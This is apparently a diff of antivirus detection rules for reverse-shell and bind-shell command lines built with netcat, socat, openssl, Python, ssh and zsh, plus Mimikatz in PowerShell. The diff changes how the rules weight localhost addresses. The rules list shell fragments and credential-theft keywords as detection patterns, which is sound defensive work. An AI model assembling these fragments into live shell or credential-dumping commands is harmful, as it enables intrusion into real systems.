((#a_00_0 & 1)*5+(#a_00_1 & 1)*5+(#a_00_2 & 1)*5+(#a_00_3 & 1)*5+(#a_02_4 & 1)*5+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*65476+(#a_00_9 & 1)*65476+(#a_00_10 & 1)*65476) >=28
|
||||
((#a_00_0 & 1)*5+(#a_00_1 & 1)*5+(#a_00_2 & 1)*5+(#a_00_3 & 1)*5+(#a_02_4 & 1)*5+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*-60+(#a_00_9 & 1)*-60+(#a_00_10 & 1)*-60) >=28
|
||||
|
||||
}
|
||||
|
|
@ -11,10 +11,10 @@ rule HackTool_Linux_SuspUnixReShellCmd_L{
|
|||
$a_00_4 = {64 00 6f 00 20 00 73 00 68 00 20 00 26 00 26 00 20 00 62 00 72 00 65 00 61 00 6b 00 3b 00 } //1 do sh && break;
|
||||
$a_00_5 = {64 00 6f 00 6e 00 65 00 20 00 32 00 3e 00 26 00 31 00 } //1 done 2>&1
|
||||
$a_00_6 = {73 00 68 00 20 00 2d 00 63 00 } //1 sh -c
|
||||
$a_00_7 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65486 127.0.0.1
|
||||
$a_00_8 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
|
||||
$a_00_9 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65486 0.0.0.0
|
||||
$a_00_7 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-50 127.0.0.1
|
||||
$a_00_8 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
|
||||
$a_00_9 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-50 0.0.0.0
|
||||
condition:
|
||||
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*65486+(#a_00_8 & 1)*65486+(#a_00_9 & 1)*65486) >=7
|
||||
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*-50+(#a_00_8 & 1)*-50+(#a_00_9 & 1)*-50) >=7
|
||||
|
||||
}
|
||||
|
|
@ -8,10 +8,10 @@ rule HackTool_Linux_SuspUnixReShellCmd_M{
|
|||
$a_00_1 = {64 00 6f 00 20 00 73 00 68 00 20 00 26 00 26 00 20 00 62 00 72 00 65 00 61 00 6b 00 3b 00 } //1 do sh && break;
|
||||
$a_00_2 = {64 00 6f 00 6e 00 65 00 20 00 32 00 3e 00 26 00 31 00 } //1 done 2>&1
|
||||
$a_00_3 = {73 00 68 00 20 00 2d 00 63 00 } //1 sh -c
|
||||
$a_00_4 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65486 127.0.0.1
|
||||
$a_00_5 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
|
||||
$a_00_6 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65486 0.0.0.0
|
||||
$a_00_4 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-50 127.0.0.1
|
||||
$a_00_5 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
|
||||
$a_00_6 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-50 0.0.0.0
|
||||
condition:
|
||||
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*65486+(#a_00_5 & 1)*65486+(#a_00_6 & 1)*65486) >=4
|
||||
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*-50+(#a_00_5 & 1)*-50+(#a_00_6 & 1)*-50) >=4
|
||||
|
||||
}
|
||||
|
|
@ -14,10 +14,10 @@ rule HackTool_Linux_SuspUnixReShellCmd_N{
|
|||
$a_00_7 = {74 00 63 00 70 00 34 00 3a 00 } //1 tcp4:
|
||||
$a_00_8 = {75 00 64 00 70 00 2d 00 63 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 3a 00 } //1 udp-connect:
|
||||
$a_00_9 = {75 00 64 00 70 00 34 00 3a 00 } //1 udp4:
|
||||
$a_00_10 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65456 127.0.0.1
|
||||
$a_00_11 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65456 localhost
|
||||
$a_00_12 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65456 0.0.0.0
|
||||
$a_00_10 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-80 127.0.0.1
|
||||
$a_00_11 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-80 localhost
|
||||
$a_00_12 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-80 0.0.0.0
|
||||
condition:
|
||||
((#a_00_0 & 1)*5+(#a_00_1 & 1)*5+(#a_00_2 & 1)*5+(#a_00_3 & 1)*5+(#a_00_4 & 1)*5+(#a_00_5 & 1)*5+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*1+(#a_00_9 & 1)*1+(#a_00_10 & 1)*65456+(#a_00_11 & 1)*65456+(#a_00_12 & 1)*65456) >=31
|
||||
((#a_00_0 & 1)*5+(#a_00_1 & 1)*5+(#a_00_2 & 1)*5+(#a_00_3 & 1)*5+(#a_00_4 & 1)*5+(#a_00_5 & 1)*5+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*1+(#a_00_9 & 1)*1+(#a_00_10 & 1)*-80+(#a_00_11 & 1)*-80+(#a_00_12 & 1)*-80) >=31
|
||||
|
||||
}
|
||||
|
|
@ -12,10 +12,10 @@ rule HackTool_Linux_SuspUnixReShellCmd_O{
|
|||
$a_01_5 = {74 00 65 00 6c 00 6e 00 65 00 74 00 } //1 telnet
|
||||
$a_00_6 = {32 00 3e 00 26 00 31 00 } //1 2>&1
|
||||
$a_00_7 = {30 00 3c 00 } //1 0<
|
||||
$a_00_8 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65486 127.0.0.1
|
||||
$a_00_9 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
|
||||
$a_00_10 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65486 0.0.0.0
|
||||
$a_00_8 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-50 127.0.0.1
|
||||
$a_00_9 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
|
||||
$a_00_10 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-50 0.0.0.0
|
||||
condition:
|
||||
((#a_02_0 & 1)*10+(#a_00_1 & 1)*1+(#a_01_2 & 1)*1+(#a_01_3 & 1)*1+(#a_01_4 & 1)*1+(#a_01_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*65486+(#a_00_9 & 1)*65486+(#a_00_10 & 1)*65486) >=15
|
||||
((#a_02_0 & 1)*10+(#a_00_1 & 1)*1+(#a_01_2 & 1)*1+(#a_01_3 & 1)*1+(#a_01_4 & 1)*1+(#a_01_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*-50+(#a_00_9 & 1)*-50+(#a_00_10 & 1)*-50) >=15
|
||||
|
||||
}
|
||||
|
|
@ -7,10 +7,10 @@ rule HackTool_MacOS_SuspNetcatCmd_A_BindShell{
|
|||
$a_00_0 = {6d 00 6b 00 66 00 69 00 66 00 6f 00 } //10 mkfifo
|
||||
$a_02_1 = {6e 00 63 00 20 00 90 02 20 2d 00 6c 00 90 00 } //30
|
||||
$a_00_2 = {73 00 68 00 20 00 } //10 sh
|
||||
$a_00_3 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
|
||||
$a_00_4 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65486 127.0.0.1
|
||||
$a_00_5 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65486 0.0.0.0
|
||||
$a_00_3 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
|
||||
$a_00_4 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-50 127.0.0.1
|
||||
$a_00_5 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-50 0.0.0.0
|
||||
condition:
|
||||
((#a_00_0 & 1)*10+(#a_02_1 & 1)*30+(#a_00_2 & 1)*10+(#a_00_3 & 1)*65486+(#a_00_4 & 1)*65486+(#a_00_5 & 1)*65486) >=50
|
||||
((#a_00_0 & 1)*10+(#a_02_1 & 1)*30+(#a_00_2 & 1)*10+(#a_00_3 & 1)*-50+(#a_00_4 & 1)*-50+(#a_00_5 & 1)*-50) >=50
|
||||
|
||||
}
|
||||
|
|
@ -9,10 +9,10 @@ rule HackTool_MacOS_SuspNetcatCmd_A_ReverseShell{
|
|||
$a_02_2 = {2f 00 62 00 69 00 6e 00 2f 00 90 02 04 73 00 68 00 90 00 } //10
|
||||
$a_00_3 = {30 00 3c 00 } //5 0<
|
||||
$a_00_4 = {32 00 3e 00 26 00 31 00 } //10 2>&1
|
||||
$a_00_5 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
|
||||
$a_00_6 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65486 127.0.0.1
|
||||
$a_00_7 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65486 0.0.0.0
|
||||
$a_00_5 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
|
||||
$a_00_6 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-50 127.0.0.1
|
||||
$a_00_7 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-50 0.0.0.0
|
||||
condition:
|
||||
((#a_00_0 & 1)*10+(#a_00_1 & 1)*20+(#a_02_2 & 1)*10+(#a_00_3 & 1)*5+(#a_00_4 & 1)*10+(#a_00_5 & 1)*65486+(#a_00_6 & 1)*65486+(#a_00_7 & 1)*65486) >=50
|
||||
((#a_00_0 & 1)*10+(#a_00_1 & 1)*20+(#a_02_2 & 1)*10+(#a_00_3 & 1)*5+(#a_00_4 & 1)*10+(#a_00_5 & 1)*-50+(#a_00_6 & 1)*-50+(#a_00_7 & 1)*-50) >=50
|
||||
|
||||
}
|
||||
|
|
@ -10,14 +10,14 @@ rule HackTool_MacOS_SuspOpensslCmd_A_ReverseShell{
|
|||
$a_00_3 = {2d 00 71 00 75 00 69 00 65 00 74 00 } //5 -quiet
|
||||
$a_00_4 = {73 00 68 00 20 00 } //15 sh
|
||||
$a_00_5 = {32 00 3e 00 26 00 31 00 } //5 2>&1
|
||||
$a_00_6 = {73 00 73 00 68 00 } //65486 ssh
|
||||
$a_00_7 = {2d 00 73 00 74 00 61 00 74 00 75 00 73 00 } //65486 -status
|
||||
$a_00_8 = {2d 00 73 00 68 00 6f 00 77 00 63 00 65 00 72 00 74 00 73 00 } //65486 -showcerts
|
||||
$a_00_9 = {6f 00 73 00 73 00 6c 00 74 00 65 00 73 00 74 00 } //65486 ossltest
|
||||
$a_00_10 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
|
||||
$a_00_11 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65486 127.0.0.1
|
||||
$a_00_12 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65486 0.0.0.0
|
||||
$a_00_6 = {73 00 73 00 68 00 } //-50 ssh
|
||||
$a_00_7 = {2d 00 73 00 74 00 61 00 74 00 75 00 73 00 } //-50 -status
|
||||
$a_00_8 = {2d 00 73 00 68 00 6f 00 77 00 63 00 65 00 72 00 74 00 73 00 } //-50 -showcerts
|
||||
$a_00_9 = {6f 00 73 00 73 00 6c 00 74 00 65 00 73 00 74 00 } //-50 ossltest
|
||||
$a_00_10 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
|
||||
$a_00_11 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-50 127.0.0.1
|
||||
$a_00_12 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-50 0.0.0.0
|
||||
condition:
|
||||
((#a_00_0 & 1)*10+(#a_00_1 & 1)*30+(#a_00_2 & 1)*20+(#a_00_3 & 1)*5+(#a_00_4 & 1)*15+(#a_00_5 & 1)*5+(#a_00_6 & 1)*65486+(#a_00_7 & 1)*65486+(#a_00_8 & 1)*65486+(#a_00_9 & 1)*65486+(#a_00_10 & 1)*65486+(#a_00_11 & 1)*65486+(#a_00_12 & 1)*65486) >=80
|
||||
((#a_00_0 & 1)*10+(#a_00_1 & 1)*30+(#a_00_2 & 1)*20+(#a_00_3 & 1)*5+(#a_00_4 & 1)*15+(#a_00_5 & 1)*5+(#a_00_6 & 1)*-50+(#a_00_7 & 1)*-50+(#a_00_8 & 1)*-50+(#a_00_9 & 1)*-50+(#a_00_10 & 1)*-50+(#a_00_11 & 1)*-50+(#a_00_12 & 1)*-50) >=80
|
||||
|
||||
}
|
||||
|
|
@ -14,10 +14,10 @@ rule HackTool_MacOS_SuspPythonCmd_A_ReverseShell{
|
|||
$a_02_7 = {63 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 90 02 02 28 00 90 00 } //5
|
||||
$a_00_8 = {64 00 75 00 70 00 32 00 } //1 dup2
|
||||
$a_00_9 = {73 00 75 00 62 00 70 00 72 00 6f 00 63 00 65 00 73 00 73 00 2e 00 70 00 69 00 70 00 65 00 } //1 subprocess.pipe
|
||||
$a_00_10 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
|
||||
$a_00_11 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65486 127.0.0.1
|
||||
$a_00_12 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65486 0.0.0.0
|
||||
$a_00_10 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
|
||||
$a_00_11 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-50 127.0.0.1
|
||||
$a_00_12 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-50 0.0.0.0
|
||||
condition:
|
||||
((#a_02_0 & 1)*10+(#a_02_1 & 1)*10+(#a_02_2 & 1)*10+(#a_02_3 & 1)*10+(#a_02_4 & 1)*15+(#a_00_5 & 1)*5+(#a_00_6 & 1)*5+(#a_02_7 & 1)*5+(#a_00_8 & 1)*1+(#a_00_9 & 1)*1+(#a_00_10 & 1)*65486+(#a_00_11 & 1)*65486+(#a_00_12 & 1)*65486) >=46
|
||||
((#a_02_0 & 1)*10+(#a_02_1 & 1)*10+(#a_02_2 & 1)*10+(#a_02_3 & 1)*10+(#a_02_4 & 1)*15+(#a_00_5 & 1)*5+(#a_00_6 & 1)*5+(#a_02_7 & 1)*5+(#a_00_8 & 1)*1+(#a_00_9 & 1)*1+(#a_00_10 & 1)*-50+(#a_00_11 & 1)*-50+(#a_00_12 & 1)*-50) >=46
|
||||
|
||||
}
|
||||
|
|
@ -16,10 +16,10 @@ rule HackTool_MacOS_SuspPythonCmd_A_ReverseShellSsl{
|
|||
$a_00_9 = {77 00 72 00 61 00 70 00 5f 00 73 00 6f 00 63 00 6b 00 65 00 74 00 } //20 wrap_socket
|
||||
$a_00_10 = {64 00 75 00 70 00 32 00 } //1 dup2
|
||||
$a_00_11 = {73 00 75 00 62 00 70 00 72 00 6f 00 63 00 65 00 73 00 73 00 2e 00 70 00 69 00 70 00 65 00 } //1 subprocess.pipe
|
||||
$a_00_12 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
|
||||
$a_00_13 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65486 127.0.0.1
|
||||
$a_00_14 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65486 0.0.0.0
|
||||
$a_00_12 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
|
||||
$a_00_13 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-50 127.0.0.1
|
||||
$a_00_14 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-50 0.0.0.0
|
||||
condition:
|
||||
((#a_02_0 & 1)*10+(#a_02_1 & 1)*10+(#a_02_2 & 1)*10+(#a_02_3 & 1)*10+(#a_00_4 & 1)*10+(#a_02_5 & 1)*15+(#a_00_6 & 1)*5+(#a_00_7 & 1)*5+(#a_02_8 & 1)*5+(#a_00_9 & 1)*20+(#a_00_10 & 1)*1+(#a_00_11 & 1)*1+(#a_00_12 & 1)*65486+(#a_00_13 & 1)*65486+(#a_00_14 & 1)*65486) >=66
|
||||
((#a_02_0 & 1)*10+(#a_02_1 & 1)*10+(#a_02_2 & 1)*10+(#a_02_3 & 1)*10+(#a_00_4 & 1)*10+(#a_02_5 & 1)*15+(#a_00_6 & 1)*5+(#a_00_7 & 1)*5+(#a_02_8 & 1)*5+(#a_00_9 & 1)*20+(#a_00_10 & 1)*1+(#a_00_11 & 1)*1+(#a_00_12 & 1)*-50+(#a_00_13 & 1)*-50+(#a_00_14 & 1)*-50) >=66
|
||||
|
||||
}
|
||||
|
|
@ -10,10 +10,10 @@ rule HackTool_MacOS_SuspSocatCmd_A_BindShell{
|
|||
$a_00_3 = {70 00 74 00 79 00 } //5 pty
|
||||
$a_00_4 = {74 00 63 00 70 00 2d 00 6c 00 69 00 73 00 74 00 65 00 6e 00 3a 00 } //1 tcp-listen:
|
||||
$a_00_5 = {75 00 64 00 70 00 2d 00 6c 00 69 00 73 00 74 00 65 00 6e 00 3a 00 } //1 udp-listen:
|
||||
$a_00_6 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
|
||||
$a_00_7 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65486 127.0.0.1
|
||||
$a_00_8 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65486 0.0.0.0
|
||||
$a_00_6 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
|
||||
$a_00_7 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-50 127.0.0.1
|
||||
$a_00_8 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-50 0.0.0.0
|
||||
condition:
|
||||
((#a_00_0 & 1)*10+(#a_00_1 & 1)*20+(#a_00_2 & 1)*5+(#a_00_3 & 1)*5+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*65486+(#a_00_7 & 1)*65486+(#a_00_8 & 1)*65486) >=41
|
||||
((#a_00_0 & 1)*10+(#a_00_1 & 1)*20+(#a_00_2 & 1)*5+(#a_00_3 & 1)*5+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*-50+(#a_00_7 & 1)*-50+(#a_00_8 & 1)*-50) >=41
|
||||
|
||||
}
|
||||
|
|
@ -12,10 +12,10 @@ rule HackTool_MacOS_SuspSocatCmd_A_ReverseShell{
|
|||
$a_00_5 = {74 00 63 00 70 00 34 00 3a 00 } //1 tcp4:
|
||||
$a_00_6 = {75 00 64 00 70 00 2d 00 63 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 3a 00 } //1 udp-connect:
|
||||
$a_00_7 = {75 00 64 00 70 00 34 00 3a 00 } //1 udp4:
|
||||
$a_00_8 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
|
||||
$a_00_9 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65486 127.0.0.1
|
||||
$a_00_10 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65486 0.0.0.0
|
||||
$a_00_8 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
|
||||
$a_00_9 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-50 127.0.0.1
|
||||
$a_00_10 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-50 0.0.0.0
|
||||
condition:
|
||||
((#a_00_0 & 1)*10+(#a_00_1 & 1)*20+(#a_00_2 & 1)*5+(#a_00_3 & 1)*5+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*65486+(#a_00_9 & 1)*65486+(#a_00_10 & 1)*65486) >=41
|
||||
((#a_00_0 & 1)*10+(#a_00_1 & 1)*20+(#a_00_2 & 1)*5+(#a_00_3 & 1)*5+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*-50+(#a_00_9 & 1)*-50+(#a_00_10 & 1)*-50) >=41
|
||||
|
||||
}
|
||||
|
|
@ -10,11 +10,11 @@ rule HackTool_MacOS_SuspSshCmd_A_ReverseShell{
|
|||
$a_00_3 = {75 00 73 00 65 00 72 00 6b 00 6e 00 6f 00 77 00 6e 00 68 00 6f 00 73 00 74 00 73 00 66 00 69 00 6c 00 65 00 3d 00 2f 00 64 00 65 00 76 00 2f 00 6e 00 75 00 6c 00 6c 00 } //10 userknownhostsfile=/dev/null
|
||||
$a_00_4 = {3c 00 30 00 } //5 <0
|
||||
$a_00_5 = {32 00 3e 00 26 00 31 00 } //5 2>&1
|
||||
$a_00_6 = {6d 00 6b 00 6c 00 6f 00 63 00 61 00 6c 00 65 00 } //65486 mklocale
|
||||
$a_00_7 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
|
||||
$a_00_8 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65486 127.0.0.1
|
||||
$a_00_9 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65486 0.0.0.0
|
||||
$a_00_6 = {6d 00 6b 00 6c 00 6f 00 63 00 61 00 6c 00 65 00 } //-50 mklocale
|
||||
$a_00_7 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
|
||||
$a_00_8 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-50 127.0.0.1
|
||||
$a_00_9 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-50 0.0.0.0
|
||||
condition:
|
||||
((#a_00_0 & 1)*10+(#a_00_1 & 1)*30+(#a_02_2 & 1)*20+(#a_00_3 & 1)*10+(#a_00_4 & 1)*5+(#a_00_5 & 1)*5+(#a_00_6 & 1)*65486+(#a_00_7 & 1)*65486+(#a_00_8 & 1)*65486+(#a_00_9 & 1)*65486) >=65
|
||||
((#a_00_0 & 1)*10+(#a_00_1 & 1)*30+(#a_02_2 & 1)*20+(#a_00_3 & 1)*10+(#a_00_4 & 1)*5+(#a_00_5 & 1)*5+(#a_00_6 & 1)*-50+(#a_00_7 & 1)*-50+(#a_00_8 & 1)*-50+(#a_00_9 & 1)*-50) >=65
|
||||
|
||||
}
|
||||
|
|
@ -8,10 +8,10 @@ rule HackTool_MacOS_SuspZshCmd_A_BindShell{
|
|||
$a_00_1 = {7a 00 6d 00 6f 00 64 00 6c 00 6f 00 61 00 64 00 } //20 zmodload
|
||||
$a_00_2 = {7a 00 73 00 68 00 2f 00 6e 00 65 00 74 00 2f 00 74 00 63 00 70 00 } //20 zsh/net/tcp
|
||||
$a_02_3 = {7a 00 74 00 63 00 70 00 20 00 90 02 20 2d 00 6c 00 90 00 } //20
|
||||
$a_00_4 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
|
||||
$a_00_5 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65486 127.0.0.1
|
||||
$a_00_6 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65486 0.0.0.0
|
||||
$a_00_4 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
|
||||
$a_00_5 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-50 127.0.0.1
|
||||
$a_00_6 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-50 0.0.0.0
|
||||
condition:
|
||||
((#a_00_0 & 1)*10+(#a_00_1 & 1)*20+(#a_00_2 & 1)*20+(#a_02_3 & 1)*20+(#a_00_4 & 1)*65486+(#a_00_5 & 1)*65486+(#a_00_6 & 1)*65486) >=70
|
||||
((#a_00_0 & 1)*10+(#a_00_1 & 1)*20+(#a_00_2 & 1)*20+(#a_02_3 & 1)*20+(#a_00_4 & 1)*-50+(#a_00_5 & 1)*-50+(#a_00_6 & 1)*-50) >=70
|
||||
|
||||
}
|
||||
|
|
@ -11,10 +11,10 @@ rule HackTool_MacOS_SuspZshCmd_A_ReverseShell{
|
|||
$a_00_4 = {7a 00 73 00 68 00 20 00 3e 00 26 00 } //10 zsh >&
|
||||
$a_00_5 = {32 00 3e 00 26 00 } //5 2>&
|
||||
$a_00_6 = {30 00 3e 00 26 00 } //5 0>&
|
||||
$a_00_7 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
|
||||
$a_00_8 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65486 127.0.0.1
|
||||
$a_00_9 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65486 0.0.0.0
|
||||
$a_00_7 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
|
||||
$a_00_8 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-50 127.0.0.1
|
||||
$a_00_9 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-50 0.0.0.0
|
||||
condition:
|
||||
((#a_00_0 & 1)*10+(#a_00_1 & 1)*20+(#a_00_2 & 1)*20+(#a_00_3 & 1)*20+(#a_00_4 & 1)*10+(#a_00_5 & 1)*5+(#a_00_6 & 1)*5+(#a_00_7 & 1)*65486+(#a_00_8 & 1)*65486+(#a_00_9 & 1)*65486) >=90
|
||||
((#a_00_0 & 1)*10+(#a_00_1 & 1)*20+(#a_00_2 & 1)*20+(#a_00_3 & 1)*20+(#a_00_4 & 1)*10+(#a_00_5 & 1)*5+(#a_00_6 & 1)*5+(#a_00_7 & 1)*-50+(#a_00_8 & 1)*-50+(#a_00_9 & 1)*-50) >=90
|
||||
|
||||
}
|
||||
|
|
@ -12,17 +12,17 @@ rule HackTool_PowerShell_Mikatz_dha_{
|
|||
$a_00_5 = {4d 00 69 00 6d 00 69 00 6b 00 61 00 74 00 7a 00 } //1 Mimikatz
|
||||
$a_00_6 = {70 00 72 00 69 00 76 00 69 00 6c 00 65 00 67 00 65 00 3a 00 3a 00 64 00 65 00 62 00 75 00 67 00 } //1 privilege::debug
|
||||
$a_00_7 = {70 00 6f 00 77 00 65 00 72 00 73 00 68 00 65 00 6c 00 6c 00 5f 00 72 00 65 00 66 00 6c 00 65 00 63 00 74 00 69 00 76 00 65 00 5f 00 6d 00 69 00 6d 00 69 00 6b 00 61 00 74 00 7a 00 } //2 powershell_reflective_mimikatz
|
||||
$a_80_8 = {77 69 6e 64 6f 77 73 5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 } //windows\kevlar-api\kevlarsigs 65516
|
||||
$a_80_9 = {5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 36 34 5c 78 36 34 5c 72 65 6c 65 61 73 65 5c 48 49 50 48 61 6e 64 6c 65 72 73 36 34 2e 70 64 62 } //\kevlar-api\kevlarsigs64\x64\release\HIPHandlers64.pdb 65516
|
||||
$a_80_10 = {5c 6d 63 61 66 65 65 5c 68 6f 73 74 20 69 6e 74 72 75 73 69 6f 6e 20 70 72 65 76 65 6e 74 69 6f 6e 5c 68 69 70 } //\mcafee\host intrusion prevention\hip 65516
|
||||
